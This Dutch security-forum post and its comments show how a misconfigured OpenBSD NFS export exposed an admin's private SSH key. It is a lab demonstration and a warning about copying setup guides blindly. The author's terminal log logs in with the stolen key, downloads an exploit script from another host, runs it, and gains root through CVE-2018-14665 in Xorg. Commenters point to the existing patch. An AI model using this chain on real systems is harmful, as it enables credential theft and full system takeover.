Security Professionals - ipfw add deny all from eindgebruikers to any

Openbsd NFS server

31-10-2018, 14:56 door yobi, 4 reacties
OpenBSD NFS server opgezet met de volgende instructies (top google resultaat):
https://nixingaround.blogspot.com/2017/02/nfs-server-on-openbsd.html

Met alldirs optie!! Zie: https://man.openbsd.org/exports.5 (Bugs section)

En het onderstaande kan dan gebeuren:

root@kali:~# showmount -e 192.168.1.127
Export list for 192.168.1.127:
/home/admin/storage (everyone)
root@kali:~# mount -tnfs 192.168.1.127:/home /mnt
root@kali:~# cd /mnt
root@kali:/mnt# ls
admin
root@kali:/mnt# cd admin
root@kali:/mnt/admin# ls
storage
root@kali:/mnt/admin# cd .ssh
root@kali:/mnt/admin/.ssh# ls
authorized_keys id_rsa id_rsa.pub
root@kali:/mnt/admin/.ssh#

En dan....
https://www.exploit-db.com/exploits/45742/

root@kali:~/OpenBSD64# ssh admin@192.168.1.127 -i id_rsa
The authenticity of host '192.168.1.127 (192.168.1.127)' can't be established.
ECDSA key fingerprint is SHA256:ubmXXNW0/cj46Jj8Jal31GFKizwxl6Rs9rg4kxxutK4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.127' (ECDSA) to the list of known hosts.
Last login: Wed Oct 31 14:25:59 2018
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

OpenBSD64$ ls
storage
OpenBSD64$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin), 0(wheel)
OpenBSD64$ ftp http://192.168.1.222/openbsd64.txt
Trying 192.168.1.222...
Requesting http://192.168.1.222/openbsd64.txt
100% |**************************************************| 2488 00:00
2488 bytes received in 0.00 seconds (5.85 MB/s)
OpenBSD64$ mv openbsd64.txt openbsd64.sh
OpenBSD64$ chmod 755 openbsd64.sh
OpenBSD64$ ./openbsd64.sh
raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>

X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.4 amd64
Current Operating System: OpenBSD OpenBSD64.lan 6.4 GENERIC#349 amd64
Build Date: 11 October 2018 01:50:08PM

Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "crontab", Time: Wed Oct 31 15:35:27 2018
(==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
mtrr set e0000000 1000000 failed: Device not configured
_FontTransOpen: Unable to Parse address * * * * * root /tmp/xorgasm

Be patient for a couple of minutes...

(II) Server terminated successfully (0). Closing log file.

Don't forget to cleanup and run crontab -e to reload the crontab.
-rw-r--r-- 1 root wheel 47321 Oct 31 15:35 /etc/crontab
-rwsrwxrwx 1 root wheel 7417 Oct 31 15:37 /usr/local/bin/pwned
OpenBSD64# id
uid=0(root) gid=0(wheel) groups=1000(admin), 0(wheel)
OpenBSD64#

Neem dus niet zo maar klakkeloos instructies over!!
Reacties (4)
31-10-2018, 15:06 door jennifer
Je boodschap is wat veel mensen in de IT vaak niet door hebben, je kan pas vertrouwen hoe "iets" werkt als je daadwerkelijk weet wat het doet en hoe het dat doet.

Mooie show overigens!
31-10-2018, 18:03 door Anoniem
Easy-to-exploit privilege escalation bug bites OpenBSD and other big name OSes
The 23-month-old flaw can be exploited by untrusted with just three commands.

Dan Goodin - Oct 26, 2018

https://arstechnica.com/information-technology/2018/10/x-org-bug-that-gives-attackers-root-bites-openbsd-and-other-big-name-oses/

OpenBSD #0day Xorg LPE via CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with 3 commands or less.
31-10-2018, 21:46 door Anoniem
En je had al wel de patches gedraaid (dit lek is al gepatcht!)

http://www.openbsd.org/errata64.html
01-11-2018, 10:39 door Anoniem
Wel het schoolvoorbeeld van iemand die z'n beheer niet op orde heeft. Het is de 25e bekend geworden en de 25e (!) gepatcht.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.